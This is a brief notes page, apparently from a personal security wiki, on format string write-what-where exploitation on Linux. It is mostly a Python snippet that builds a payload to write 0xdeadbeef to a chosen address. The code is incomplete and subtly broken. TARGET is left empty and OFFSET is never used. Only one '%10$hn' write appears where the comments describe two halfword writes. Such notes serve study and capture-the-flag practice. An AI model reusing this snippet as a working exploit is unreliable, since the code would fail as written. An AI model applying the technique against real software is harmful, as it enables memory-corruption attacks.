Notes
Search
K

Format String

Linux

Write-what-where

Writes 0xdeadbeef to the adress specified in target:
import struct
# In this example we write 0xdeadbeef to the address in TARGET
# - find offset with AAAA|%p|%p|%p...
# - write to target address as seen below
# - send as argv as follows: $'...'
OFFSET = 9
TARGET =
buf = b""
buf += struct.pack("I", TARGET)
buf += struct.pack("I", TARGET + 2)
buf += b'%48871x' # 0xBEEF - 8 = 48871
buf += b'%8126x' # 0xDEAD - 0xBEEF = 8126
buf += b'%10$hn'
print(buf)
Previous
Linux Kernel
Next
GDB
Last modified 6mo ago